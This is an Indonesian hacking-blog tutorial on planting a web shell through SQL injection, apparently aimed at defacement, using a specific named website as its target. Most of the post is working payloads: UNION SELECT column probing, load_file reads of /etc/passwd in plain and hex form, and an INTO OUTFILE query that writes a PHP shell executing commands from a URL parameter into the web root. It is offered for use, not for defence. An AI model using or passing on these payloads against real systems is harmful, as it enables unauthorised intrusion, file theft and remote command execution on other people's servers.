Beranda  ›  Hacking  ›  Informasi  ›  tutorial

Tutorial Upload Shell via SQL Injection Tanpa Login Admin.

Rabu, 22 Mei 2019 Tulis Komentar



Tutorial Upload Shell via SQL Injection Tanpa Login Admin.

Assalamualaikum wr wb, Yeyeyeye balik lage sama w Nelo.F4. Di
kesempatan kali ini w bakal bikin artikel Tutorial Upload Shell via SQL Injection Tanpa Login Admin atau juga bisa disebut into out file. Langsung aja ke tutornya gan!crot


Pertama cek dulu target vuln sql apa engga kasih string (') tanpa tanda kurung, buat yang belum paham bisa kesini http://www.explosionsquadcyber.id/2019/05/cara-deface-poc-sql-injection-with-dios.html


lanjut ke step 

1. disini target w kek gini https://www.orgil.co.id/file.php?id=1

2. kasih string (') tanpa tanda kurung. jika error berarti vuln.

3. cek kolom https://www.orgil.co.id/file.php?id=1' order by 1-- -
   misalnya disini errornya di angka 5 berarti union statments 
   sampe 4 ya.

4. lanjut ke union select, 
   https://www.orgil.co.id/file.php?id=-1' union select 1,2,3,4-- -

5. disini kalo blm keluar nomer togelnya coba di waf, dan kalo udah    keluar coba /etc/passwd taro di nomer togelnya ya.
   
   NON HEX: https://www.orgil.co.id/file.php?id=-1' union select 
            1,2,load_file('/etc/passwd'),4-- -

   HEX: https://www.orgil.co.id/file.php?id=-1' union select
        1,2,load_file(0x2f6574632f706173737764),4-- -

6. jika keluar isi passwdnya berati bisa di write/uploadshell kalau
   gakeluar (TINGGALKAN!MOVEON AYO GAN KLEN BISA!!)


7. next ke write shellnya gan

   NON HEX: https://www.orgil.co.id/file.php?id=-1' union select
            1,2,"<? system($_GET['cmd']); ?>",4 INTO OUTFILE 
               "/home/user/public_html/writeabledir/namafile.php"-- -   

   HEX: https://www.orgil.co.id/file.php?id=-1' union select
        1,2,0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e,4 INTO
          OUTFILE "/home/user/public_html/writeabledir/namafile.php"-- -

8. kalau berhasil bakalan kaya gini (example)

 
           
kalo agan-agan semua penasaran sama user websitenya bisa coba perintah ini "CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()" tanpa tanda kutip!


lanjutan: /home/user/public_html/writeabledir/namafile.php (Bisa agan ganti sesuai username, lokasi dirnya, dan namafile shellnya) contoh /home/weborangco/public_html/site/x.php


GoodLuck:)

BigThanks SHB

Oke mungkin ini perpisahan kyta h3h3h3, Sekian aja dari gw Nelo.F4 kalo ada pertanyaan bisa kontak ke fp Explosion Squad Cyber Di Facebook.kurang lebihnya mohon di maafkan wassalamualaikum wr wb.

Belum ada Komentar untuk "Tutorial Upload Shell via SQL Injection Tanpa Login Admin."

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel